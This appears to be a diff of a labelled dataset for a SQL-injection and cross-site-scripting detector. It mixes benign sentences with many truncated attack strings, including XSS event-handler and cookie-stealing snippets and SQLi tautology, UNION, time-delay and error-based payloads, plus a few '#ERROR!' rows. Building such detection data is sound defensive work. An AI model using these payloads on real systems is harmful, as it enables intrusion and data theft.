-I want to select a new phone for my dad.,0,normal,23868 -"{""id"":null,""firstName"":""Eddie"",""lastName"":""Khoo"",""",0,normal,27519 -"Their job — Ivry's job — was to eliminate targets,",0,normal,25348 -<svg><dfn onload=alert(1)></dfn>,1,XSS,7703 -’ or ‘1’=’1,2,SQLi,22499 -waitfor delay '0:0:20' /*,2,SQLi,22490 -"<ol onclick=""alert(1)"">test</ol>",1,XSS,4637 -"-7381' ) ) or elt ( 5882 = 5919,5919 ) and ( ( 'nz",2,SQLi,15453 -Update the page.,0,normal,22831 -"<style>@keyframes slidein {}</style><tr style=""ani",1,XSS,2789 -"<menuitem draggable=""true"" ondragstart=""alert(1)"">",1,XSS,6269 -"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a7",2,SQLi,13094 -"<IMG SRC=x onpageshow=""alert(String.fromCharCode(8",1,XSS,1181 -"1"" where 1982 = 1982",2,SQLi,16953 -"<xss draggable=""true"" ondragend=""alert(1)"" style=d",1,XSS,62 -"1%"" ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d",2,SQLi,13848 -"-9688%' ) ) ) or elt ( 3695 = 7995,7995 ) and ( ( ",2,SQLi,14269 -"<var onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,5423 -""" or """" """,2,SQLi,11686 -"1', ( select ( case when ( 1902 = 5536 ) then 1 el",2,SQLi,13742 -&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS,1,XSS,1460 -1%' and 8514 = ( select count ( * ) from domain.do,2,SQLi,20711 -select ( case when ( 5752 = 6036 ) then 1 else 575,2,SQLi,15244 -"<title draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,5359 +A snowblower buying guide can help you select the ,0,normal,26430 +"For the Apple News app, editors select stories fro",0,normal,26172 +-7562 ) or 8571 = 8571--,2,SQLi,12199 +"<IMG SRC=x onloadstart=""alert(String.fromCharCode(",1,XSS,1227 +1%' ) and ( select * from ( select ( sleep ( 5 ) ),2,SQLi,15912 +"<style>@keyframes slidein {}</style><title style=""",1,XSS,6411 +"1' ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,22038 +1' or 2633 = dbms_pipe.receive_message ( chr ( 112,2,SQLi,12187 +1 where 3735 = 3735,2,SQLi,17229 +"<title draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,4757 +AND 1 = utl_inaddr.get_host_address ( ( SELECT ban,2,SQLi,11814 +"1"" ) and elt ( 4249 = 4249,7259 ) and ( ""upkx"" = """,2,SQLi,13884 +"<datalist onbeforecut=""alert(1)"" contenteditable>t",1,XSS,6958 +"<fieldset onkeyup=""alert(1)"" contenteditable>test<",1,XSS,6113 +Where's the missing page?,0,normal,22685 +<big id=x tabindex=1 onfocusin=alert(1)></big>,1,XSS,6764 +1 and 6510 = ( select count ( * ) from sysusers as,2,SQLi,15048 +1 ) or ( select 2* ( if ( ( select * from ( select,2,SQLi,14190 +Save 25% off select Certified Refurbished Philips ,0,normal,25729 +Select the right color for the walls.,0,normal,24215 +<colgroup onpointerout=alert(1)>XSS</colgroup>,1,XSS,4863 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10670 +"1"" ) ) as jebl where 3464 = 3464",2,SQLi,18760 +1%' ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70,2,SQLi,12168 +Select the right route for your journey.,0,normal,24224 +"<menuitem draggable=""true"" ondragstart=""alert(1)"">",1,XSS,6269 +"SLEEP(1)/*' or SLEEP(1) or '"" or SLEEP(1) or ""*/",2,SQLi,10417 +Select a flavor for the dish.,0,normal,24015 +end and ( ( ( 3673 = 3673,2,SQLi,16146 +"<marquee draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,3799 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10422 +<acronym id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,3907 +select,0,normal,26557 +1'|| ( select 'xmoq' from dual where 8047 = 8047 a,2,SQLi,19247 +<svg><animate onbegin=alert() attributeName=x></sv,1,XSS,9469 +"-1425"" ) where 8056 = 8056 or elt ( 1032 = 1032,36",2,SQLi,12659 +1 ) ) as dhge where 4816 = 4816 and 2388 = benchma,2,SQLi,14496 +A select company of these met at the parsonage on ,0,normal,26420 +"1%"" ) or row ( 1045,7562 ) > ( select count ( * ) ",2,SQLi,15399 +1 ) as qkkm where 8461 = 8461,2,SQLi,14798 +Whether you choose to select the pattern in secret,0,normal,25136 +"1 where 8905 = 8905 and make_set ( 7654 = 1923,192",2,SQLi,16886 +1'+ ( select 'vddk' where 6961 = 6961,2,SQLi,19798 +Select your favorite sport.,0,normal,24274 +1 rlike ( select ( case when ( 8314 = 5463 ) then ,2,SQLi,18308 +<meter onpointerleave=alert(1)>XSS</meter>,1,XSS,7705 +)))))) waitfor delay '0:0:20' /*,2,SQLi,22496 +"select pg_sleep ( 5 ) and ( ( ( ""nvuv"" like ""nvuv",2,SQLi,14004 +"<nextid onmousedown=""alert(1)"">test</nextid>",1,XSS,4639 +"1"" ) ) ) and row ( 6237,7469 ) > ( select count ( ",2,SQLi,15445 +Where is the schema defined?,0,normal,23472 +<center onpointerleave=alert(1)>XSS</center>,1,XSS,2790 +"<acronym onmouseleave=""alert(1)"">test</acronym>",1,XSS,6271 +"-5903%"" ) ) ) or 3038 = 3038",2,SQLi,13096 +"<IMG SRC=x onpopstate=""alert(String.fromCharCode(8",1,XSS,1182 +"1"" ) and 8407 = ( select count ( * ) from generate",2,SQLi,16951 +"<xss draggable=""true"" ondragend=""alert(1)"" style=d",1,XSS,62 +"1"" ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ",2,SQLi,13841 +"-6599"" ) ) union all select 2870,2870,2870,2870,28",2,SQLi,20433 +<p id=x tabindex=1 onfocus=alert(1)></p>,1,XSS,5425 + or 1 = 1 --,2,SQLi,11688 +Where did you find that inspiring artwork?,0,normal,23776 +&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6,1,XSS,1461 +I need to decide where to go for a cultural event.,0,normal,23885 +"1', ( select upper ( xmltype ( chr ( 60 ) ||chr ( ",2,SQLi,15650 +<isindex onblur=alert(1) tabindex=1 id=x></isindex,1,XSS,5361 "{""id"":null,""firstName"":""Violet"",""lastName"":""Goh"",""",0,normal,27438 -"-7378' union all select 2071,2071,2071,2071,2071,2",2,SQLi,17288 -"<time onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,2187 -1' ) as wquy where 2518 = 2518,2,SQLi,19051 -"<table onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,7337 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10996 +"1%' union all select null,null,null,null,null,null",2,SQLi,17286 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2188 +-2424 ) where 8132 = 8132 or 5023 = ctxsys.drithsx,2,SQLi,14062 +<hr onpointerenter=alert(1)>XSS</hr>,1,XSS,7339 +#ERROR!,2,SQLi,10998 "<script>if(""x\\xE1\x96\x89"".length==2) { javascrip",1,XSS,453 -"1"" ) ) as sqow where 8752 = 8752",2,SQLi,15415 --8486%' ) ) ) or 8571 = 8571--,2,SQLi,19179 -><script+src=https://accounts.google.com/o/oauth2/,1,XSS,9779 -&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&q,1,XSS,1396 -"and substring(password/text(),1,1)='7",2,SQLi,10027 -"{""id"":null,""name"":""American Bulldog""}",0,normal,27060 -"<style>@keyframes x{}</style><figure style=""animat",1,XSS,3890 -""",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10867 -Join the discussion.,0,normal,22779 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,15407 +"1%' ) ) union all select null,null,null,null,null-",2,SQLi,19676 +><script+src=https://translate.yandex.net/api/v1.5,1,XSS,9781 +&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;,1,XSS,1397 +select @@servernamee,2,SQLi,10029 +"{""id"":null,""name"":""Megidramon""}",0,normal,27057 +"<th onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,3892 +"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10869 +Update your status.,0,normal,22776 /><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:,1,XSS,597 -"<dl onkeyup=""alert(1)"" contenteditable>test</dl>",1,XSS,5621 -1 ) where 4573 = 4573,2,SQLi,14749 --8410' ) ) ) or 8571 = 8571--,2,SQLi,13044 -1 ) as usnn where 3201 = 3201,2,SQLi,14280 -"-5830 ) or 1570 = convert ( int, ( select char ( 1",2,SQLi,21624 -23 or 1=1; --,2,SQLi,11056 -1' ) ) ) waitfor delay '0:0:5'--,2,SQLi,21402 -"<basefont draggable=""true"" ondragleave=""alert(1)"">",1,XSS,5640 -"<acronym onkeydown=""alert(1)"" contenteditable>test",1,XSS,4850 -"<del oncontextmenu=""alert(1)"">test</del>",1,XSS,3300 +"<dd draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,5623 +"-9661"" ) ) ) union all select 2158,2158,2158--",2,SQLi,14742 +-5751 ) as jybu where 4739 = 4739 or 2724 in ( ( c,2,SQLi,13046 +"-9587 union all select 1568,1568,1568,1568,1568,15",2,SQLi,21419 +-3924'|| ( select 'ssld' from dual where 6229 = 62,2,SQLi,21622 +\'; desc users; --,2,SQLi,11058 +"-8703' ) where 9723 = 9723 union all select 9723,9",2,SQLi,21400 +<area onblur=alert(1) tabindex=1 id=x></area><inpu,1,XSS,5642 +"<rtc onclick=""alert(1)"">test</rtc>",1,XSS,4852 +"<picture onclick=""alert(1)"">test</picture>",1,XSS,3302 "<div draggable=""true"" contenteditable>drag me</div",1,XSS,65 -"-5845' ) ) ) union all select 3595,3595,3595,3595,",2,SQLi,20170 -"-9937' ) ) union all select 3900,3900,3900,3900,39",2,SQLi,19740 -"<font onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,3033 -select,0,normal,26634 -"1', ( select ( case when ( 9443 = 9443 ) then slee",2,SQLi,12096 -<div onpointermove=alert(1)>XSS</div>,1,XSS,2095 -"From there, select Language and Input and then On-",0,normal,26153 -"{""id"":null,""firstName"":""Irene"",""lastName"":""Tan"",""a",0,normal,26966 -"tYPE=""text/x-scriptlet"" DATA=""http://.rocks/script",1,XSS,6183 -1 ) as fgqe where 1526 = 1526 and ( select 2* ( if,2,SQLi,21088 -1' ) ) or 8315 = ( select count ( * ) from sysibm.,2,SQLi,21631 -<figure onpointermove=alert(1)>XSS</figure>,1,XSS,3857 -<font id=x tabindex=1 onactivate=alert(1)></font>,1,XSS,4460 -<frame onpointerdown=alert(1)>XSS</frame>,1,XSS,6602 -AND 7506=9091 AND (5913=5913,2,SQLi,10224 -"1"" ) ) ) or updatexml ( 1808,concat ( 0x2e,0x71717",2,SQLi,12915 -"<object onclick=""alert(1)"">test</object>",1,XSS,6082 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,16958 -"<applet onmouseover=""alert(1)"">test</applet>",1,XSS,1830 -"{""id"":null,""name"":""course""}",0,normal,27310 --7511 ) ) as xqzf where 9939 = 9939 union all sele,2,SQLi,16746 -Select your favorite food.,0,normal,24321 -1' ) ) and 4386 = utl_inaddr.get_host_address ( ch,2,SQLi,16976 -"<nobr onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,5839 -"-8608"" or 5460 = 4461--",2,SQLi,17672 -</title><SCRIPT>document.vulnerable=true;</script>,1,XSS,1485 -<article onfocusout=alert(1) tabindex=1 id=x></art,1,XSS,6089 -"<output oncut=""alert(1)"" contenteditable>test</out",1,XSS,6912 -"{""id"":null,""name"":""tide or""}",0,normal,27155 -1 ) where 5048 = 5048 or char ( 119 ) ||char ( 100,2,SQLi,16595 -"{""id"":null,""name"":""hung""}",0,normal,26822 -I'm thinking of where to go for a scenic hike.,0,normal,23983 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3648 -"<html onmousedown=""alert(1)"">test</html>",1,XSS,4930 --2784 ) where 5261 = 5261 or 3472 = 1728#,2,SQLi,19244 -"iif ( 1149 = 4765,1,1/0 )",2,SQLi,19786 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7345 -1)) or pg_sleep(__TIME__)--,2,SQLi,10111 -<title onfocusout=alert(1) tabindex=1 id=x></title,1,XSS,3832 -"-6381%"" or 8571 = 8571--",2,SQLi,19172 -"{""id"":null,""firstName"":""Tan"",""lastName"":""Jingheng""",0,normal,27184 -1 ) ) as oqui where 3368 = 3368 order by 1--,2,SQLi,16021 -1' and 6537 = dbms_pipe.receive_message ( chr ( 76,2,SQLi,21420 -1 where 6434 = 6434,2,SQLi,17595 -1'+ ( select 'yzxc' where 5230 = 5230 ( select ( c,2,SQLi,12253 -1'+ ( select lgkd where 7801 = 7801 and elt ( 4249,2,SQLi,19754 -1' and 4386 = utl_inaddr.get_host_address ( chr ( ,2,SQLi,19757 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10441 -<button onFocusIn=javascript:alert(1)>,1,XSS,9617 -<slot onpointerover=alert(1)>XSS</slot>,1,XSS,6691 -<svg><details onload=alert(1)></details>,1,XSS,7056 --7580' ) ) as mmqt where 3468 = 3468 union all sel,2,SQLi,15544 -1' ) ) as nuku where 7009 = 7009 union all select ,2,SQLi,17382 -<kbd onpointerover=alert(1)>XSS</kbd>,1,XSS,8661 +"1 or ( select 9173 from ( select count ( * ) ,conc",2,SQLi,14814 +1 ) as phja where 4627 = 4627,2,SQLi,19738 +"<nobr onmouseup=""alert(1)"">test</nobr>",1,XSS,3034 +select,0,normal,26631 +"-4925"" union all select 5686,5686,5686,5686,5686,5",2,SQLi,12098 +"<menu oncontextmenu=""alert(1)"">test</menu>",1,XSS,2096 +"Get $100 off select PlayStation 4 consoles, $100-$",0,normal,26150 +"1 ) and make_set ( 8403 = 8403,8899 ) and ( 9761 =",2,SQLi,17505 +"<br onmouseleave=""alert(1)"">test</br>",1,XSS,6185 +I need to decide where to go for a day trip.,0,normal,23742 +1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,21629 +"<picture><source srcset=""validimage.png""><image on",1,XSS,3859 +<style>:target {color:red;}</style><address id=x s,1,XSS,4462 +<aside id=x tabindex=1 onactivate=alert(1)></aside,1,XSS,6604 +AND 7506=9091 AND ('5913=5913,2,SQLi,10226 +"select * from generate_series ( 4465,4465,case whe",2,SQLi,12917 +"<blockquote oncopy=""alert(1)"" contenteditable>test",1,XSS,6084 +"1"" ) ) ) or 4411 = ( select count ( * ) from sysus",2,SQLi,16956 +"<figure onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,1831 +-3211 ) ) as fsej where 6348 = 6348 or 9805 = 3783,2,SQLi,14480 +"1"" and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,16744 +Update your profile with the new picture.,0,normal,22891 +"1"" ) or sleep ( 5 ) and ( ""xgtk"" = ""xgtk",2,SQLi,16974 +"<style>@keyframes x{}</style><strike style=""animat",1,XSS,5841 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,21292 +"<input TYPE=""IMAGE"" SRC=""javascript:document.vulne",1,XSS,1486 +<picture id=x tabindex=1 onfocusin=alert(1)></pict,1,XSS,6091 +"<tfoot onpaste=""alert(1)"" contenteditable>test</tf",1,XSS,6914 +Select the right playlist for the party.,0,normal,24175 +"1' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( 'yzn",2,SQLi,15609 +-2951 or 4144 = ( select upper ( xmltype ( chr ( 6,2,SQLi,21731 +1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char,2,SQLi,16714 +"<style>@keyframes x{}</style><bdi style=""animation",1,XSS,3650 +<style>:target {color:red;}</style><form id=x styl,1,XSS,4932 +1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,19242 +"1"" ) union all select null,null,null,null,null,nul",2,SQLi,19784 +"<style>@keyframes slidein {}</style><aside style=""",1,XSS,7347 +union all select @@version--,2,SQLi,10113 +"<style>@keyframes x{}</style><track style=""animati",1,XSS,3834 +Select a piece of artwork for the room.,0,normal,24211 +1' and ( 3435 = 7210 ) *7210 and 'lxxt' = 'lxxt,2,SQLi,19116 +1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,16013 +-8729'+ ( select 'nbzl' where 7160 = 7160 order by,2,SQLi,14543 +1%' or 1022 = ( select count ( * ) from all_users ,2,SQLi,14361 +"-7813"" ) ) as yvyl where 5172 = 5172 union all sel",2,SQLi,12255 +"1"" ) ) as qrrx where 4633 = 4633 and 9660 = ( sele",2,SQLi,19752 +"1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ",2,SQLi,19755 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10443 +<button onHashChange=javascript:alert(1)>,1,XSS,9619 +<ul onfocusout=alert(1) tabindex=1 id=x></ul><inpu,1,XSS,6693 +"<select oncontextmenu=""alert(1)"">test</select>",1,XSS,7058 +"-6096' ) where 1316 = 1316 union all select 1316,1",2,SQLi,15536 +1' ) as fyuh where 7608 = 7608 and 4241 = convert ,2,SQLi,20471 +"<details onbeforepaste=""alert(1)"" contenteditable>",1,XSS,8663 "<audio autoplay onplaying=alert(1)><source src=""va",1,XSS,28 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,13562 -#ERROR!,2,SQLi,10968 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4148 +1 where 3799 = 3799 and char ( 109 ) ||char ( 79 ),2,SQLi,13555 +#ERROR!,2,SQLi,10970 +"<dt onkeydown=""alert(1)"" contenteditable>test</dt>",1,XSS,4150 <a onmouseover=alert(document.cookie)>xxs link</a>,1,XSS,806 -1' ) or ( select 2* ( if ( ( select * from ( selec,2,SQLi,18741 -"1"" ) and 3754 = ( select upper ( xmltype ( chr ( 6",2,SQLi,16853 -"1"" where 7279 = 7279 or 8514 = benchmark ( 5000000",2,SQLi,20507 -"{""id"":null,""name"":""pig""}",0,normal,26995 -Where's the party?,0,normal,23485 -You can find the new collection in select Levi's s,0,normal,25094 --1802' or 7931 = 5841--,2,SQLi,13739 -<x contenteditable onblur=alert(1)>lose focus!,1,XSS,9336 -"-5193 where 2175 = 2175 union all select 2175,2175",2,SQLi,21446 -"{""id"":null,""firstName"":""Alan"",""lastName"":""Meng"",""s",0,normal,26807 -"You select a unit with the right trigger, select w",0,normal,25058 -Select the right path for your adventure.,0,normal,24034 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11101 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,15396 -Show me where it's saved.,0,normal,23312 -select ( case when ( 1961 = 2048 ) then 1961 else ,2,SQLi,20717 -"1%"" ) or exp ( ~ ( select * from ( select concat (",2,SQLi,15134 +"1"" ) ) ) or 4411 = ( select count ( * ) from sysus",2,SQLi,18739 +"1"" ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240",2,SQLi,22051 +"{""id"":null,""firstName"":""Ah Wen"",""lastName"":""Ang"",""",0,normal,27092 +1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121,2,SQLi,18699 +"1"" ) ) waitfor delay '0:0:5'--",2,SQLi,20532 +Select the language that you want your Roku to dis,0,normal,25593 +1'+ ( select eluw where 6210 = 6210,2,SQLi,13732 +<x contenteditable oninput=alert(1)>input here!,1,XSS,9338 +"-6580' ) union all select 9950,9950,9950,9950,9950",2,SQLi,17750 +"1"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""zzca"" =",2,SQLi,19086 +You'll need to register (or re-register) using thi,0,normal,25055 +"-4889"" ) ) as vvuo where 8060 = 8060 or ( 8459 = 8",2,SQLi,14478 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11103 +1 ) as zelk where 1944 = 1944 or char ( 117 ) ||ch,2,SQLi,19005 +"1"" where 2878 = 2878 union all select null,null,nu",2,SQLi,22318 +1' and 6240 = ( 'qqpjq'|| ( select case 6240 when ,2,SQLi,15742 +She'll select her shoes.,0,normal,24342 "&lt;META HTTP-EQUIV=\""Link\"" Content=\""&lt;http&#5",1,XSS,986 -"1"" ) and 6565 = 2647 and ( ""mrge"" like ""mrge",2,SQLi,14541 -Update your status.,0,normal,22776 -"1"" and 4595 = 4595#",2,SQLi,18141 -<i onpointerout=alert(1)>XSS</i>,1,XSS,6584 -round,0,normal,23208 -"1%"" union all select null,null,null,null,null,null",2,SQLi,13144 +-1188 ) ) union all select 4711--,2,SQLi,20685 +Join fitness class.,0,normal,22773 +"1"" rlike ( select ( case when ( 7689 = 7689 ) then",2,SQLi,18139 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6586 +second,0,normal,23205 +1'+ ( select unzl where 3432 = 3432 union all sele,2,SQLi,13146 <IMG SRC=jAVasCrIPt:alert(‘XSS’)>,1,XSS,926 --9840 ) ) as thod where 4790 = 4790 or 1570 = conv,2,SQLi,17240 +-9191' ) as qtvm where 2838 = 2838 or ( 8459 = 845,2,SQLi,17238 "&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\""XS",1,XSS,1004 -1' ) ) as lxjs where 6503 = 6503 procedure analyse,2,SQLi,19508 -<dialog id=x tabindex=1 onfocus=alert(1)></dialog>,1,XSS,8036 -<button onMoveStart=javascript:alert(1)>,1,XSS,9641 -"1"" ) as vqkz where 8536 = 8536",2,SQLi,17329 -"1"" ) union all select null,null,null,null,null,nul",2,SQLi,22291 -"select pg_sleep ( 5 ) and ( ( ""qani"" = ""qani",2,SQLi,21211 -"<pre onmouseup=""alert(1)"">test</pre>",1,XSS,7751 -Select a location.,0,normal,24823 -Filter results.,0,normal,23049 -delete,0,normal,23108 -<tt onpointerleave=alert(1)>XSS</tt>,1,XSS,5350 -1' ) ) ) and 3754 = ( select upper ( xmltype ( chr,2,SQLi,22309 --1386' ) or ( 7880 = 5362 ) *5362 and ( 'vsyu' lik,2,SQLi,16424 -"-4586 union all select 2068,2068,2068,2068--",2,SQLi,22407 -"1 where 7757 = 7757 and updatexml ( 3393,concat ( ",2,SQLi,22370 -Select crops will be grown indoors using hydroponi,0,normal,25633 -"1%"" procedure analyse ( extractvalue ( 5840,concat",2,SQLi,20194 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2799 -"<command onmouseenter=""alert(1)"">test</command>",1,XSS,3455 -"Rokke, a former US army colonel, also briefed the ",0,normal,25740 -1 uni/**/on select all from where,2,SQLi,11064 -"1"" ) ) as uxnc where 8041 = 8041 and 9198 = 9198--",2,SQLi,18095 -""" Select Medical Holdings: ""I kind of like that co",0,normal,26466 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10754 -"-4528"" ) or 5903 = ( 'qqpjq'|| ( select case 5903 ",2,SQLi,21754 -"<tr onkeypress=""alert(1)"" contenteditable>test</tr",1,XSS,5596 -<button onMoveEnd=javascript:alert(1)>,1,XSS,9640 -"<code onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,2325 -or SELECT SLEEP(5); #,2,SQLi,11168 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8646 -"1"" ) where 2088 = 2088 union all select null,null,",2,SQLi,17253 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,20236 -or 3 = 3 --,2,SQLi,22488 -"1%' ) ) procedure analyse ( extractvalue ( 9627,co",2,SQLi,14558 -"<plaintext onbeforecopy=""alert(1)"" contenteditable",1,XSS,5442 -Create poem.,0,normal,23064 -"1%"" ) ) ) and ( 3502 = 7893 ) *7893 and ( ( ( ""%"" ",2,SQLi,18183 -I can't say how much I enjoyed the streams today. ,0,normal,26493 -"<hgroup onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,7183 -1'|| ( select 'ydvg' from dual where 7108 = 7108,2,SQLi,15482 -"<details onbeforecut=""alert(1)"" contenteditable>te",1,XSS,5342 -"<address draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,3731 -"1%' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex (",2,SQLi,13229 -><script+src=https://ulogin.ru/token.php?callback=,1,XSS,9809 -"1"" ) as mszg where 6184 = 6184 rlike sleep ( 5 ) -",2,SQLi,15727 -"1 where 6965 = 6965 and elt ( 3933 = 1232,1232 ) -",2,SQLi,20688 +Let's decide where to go for our next adventure.,0,normal,23734 +<nextid onpointerleave=alert(1)>XSS</nextid>,1,XSS,8038 +<button onOnline=javascript:alert(1)>,1,XSS,9643 +"1"" ) where 5794 = 5794 union all select null,null,",2,SQLi,17327 +select ( case when ( 8993 = 4660 ) then 1 else 899,2,SQLi,22289 +1 ) ) as rbcf where 1053 = 1053,2,SQLi,21209 +"<hr onmouseup=""alert(1)"">test</hr>",1,XSS,7753 +)))) waitfor delay '0:0:20' /*,2,SQLi,22494 +1 where 6119 = 6119 or 2367 = ( select count ( * ),2,SQLi,17859 +where,0,normal,23105 +<code onpointerenter=alert(1)>XSS</code>,1,XSS,5352 +"1' or elt ( 6272 = 6272,sleep ( 5 ) ) and 'wdoi' =",2,SQLi,22307 +-9103' or 4493 = utl_inaddr.get_host_address ( chr,2,SQLi,16422 +select ( case when ( 9931 = 3424 ) then 1 else 993,2,SQLi,14286 +"1' ) ) and extractvalue ( 7982,concat ( 0x5c,0x717",2,SQLi,22368 +"Select Entry Copy User ID or Copy Password, then p",0,normal,25630 +"-8521' ) union all select 2446,2446,2446,2446,2446",2,SQLi,20192 +"<summary onmousemove=""alert(1)"">test</summary>",1,XSS,2800 +"<h1 onmousedown=""alert(1)"">test</h1>",1,XSS,3457 +S. purchases for advertising in select media (onli,0,normal,25737 +||utl_http.request('httP://192.168.1.1/')||',2,SQLi,11066 +"1%"" ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr (",2,SQLi,18093 +Aluminium is so light that it is a matter requirin,0,normal,26384 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10756 +"{""id"":null,""name"":""Palpitoad""}",0,normal,27294 +"<nav onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,5598 +<button onOffline=javascript:alert(1)>,1,XSS,9642 +"<style>@keyframes x{}</style><dl style=""animation-",1,XSS,2326 +) OR SLEEP(5)#,2,SQLi,11170 +"<xmp onpaste=""alert(1)"" contenteditable>test</xmp>",1,XSS,8648 +"Select ""CC"" to open begin typing in the email addr",0,normal,25682 +"-3729' ) ) or elt ( 4482 = 2648,2648 ) and ( ( 'vk",2,SQLi,21825 +1%' ) ) ) and 4595 = 4595#,2,SQLi,15618 +"1 ) union all select null,null--",2,SQLi,14551 +"<html oncopy=""alert(1)"" contenteditable>test</html",1,XSS,5444 +"With that in mind, both the The Real Estate Select",0,normal,25113 +"Gaine, general manager of the company, stated befo",0,normal,26151 +1' where 5455 = 5455 and sleep ( 5 ) --,2,SQLi,17446 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7185 +"select * from generate_series ( 1488,1488,case whe",2,SQLi,17429 +<img onpointerover=alert(1)>XSS</img>,1,XSS,5344 +"<q onkeyup=""alert(1)"" contenteditable>test</q>",1,XSS,3733 +"1%"" ) or 4915 = ( select count ( * ) from domain.d",2,SQLi,13231 +><script+src=https://appcenter.intuit.com/Account/,1,XSS,9811 +1' where 7464 = 7464 and 2388 = benchmark ( 500000,2,SQLi,15719 +"-2601' ) union all select 2866,2866,2866,2866,2866",2,SQLi,20686 "<audio onloadeddata=alert(1)><source src=""validaud",1,XSS,23 -1'|| ( select 'yaii' from dual where 7317 = 7317 u,2,SQLi,15411 -1'|| ( select 'zxla' from dual where 7634 = 7634 a,2,SQLi,16071 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3414 -"<picture onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,8886 -"1' ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544",2,SQLi,17918 -"select * from users where id = 1 union select !<1,",2,SQLi,11577 -<acronym onpointermove=alert(1)>XSS</acronym>,1,XSS,4503 -<style>:target {color: red;}</style><address id=x ,1,XSS,3981 -"-8106%"" ) union all select 2051,2051,2051,2051,205",2,SQLi,20857 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--",2,SQLi,10775 -"<content onmousemove=""alert(1)"">test</content>",1,XSS,2164 -1'|| ( select 'exls' where 3837 = 3837 and sleep (,2,SQLi,13997 -"<col onkeypress=""alert(1)"" contenteditable>test</c",1,XSS,2897 -<menu onpointerout=alert(1)>XSS</menu>,1,XSS,6628 --9653' ) where 2705 = 2705 or 9323 = 9323#,2,SQLi,18330 -""" and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11025 -1 ) ) as mcyh where 1001 = 1001,2,SQLi,17830 -index,0,normal,23113 -As a Registered User you will be able to select to,0,normal,26355 -"1' and 4241 = convert ( int, ( select char ( 113 )",2,SQLi,20702 -"-7345%"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ",2,SQLi,18913 -"<pre onmouseleave=""alert(1)"">test</pre>",1,XSS,1993 -Select appetizer.,0,normal,24498 -"<content onclick=""alert(1)"">test</content>",1,XSS,3196 -1'+ ( select tnch where 1867 = 1867 or char ( 117 ,2,SQLi,21621 -<rb id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,8116 -"waitfor delay '0:0:5' and ( ( ""zili"" like ""zili",2,SQLi,17301 -<svg><path><animateMotion onend=alert(1) dur=1s re,1,XSS,5328 +"1"" where 5372 = 5372 and 8514 = ( select count ( *",2,SQLi,15403 +"-6626%"" ) or 1744 = 5292 and ( ""%"" = """,2,SQLi,14192 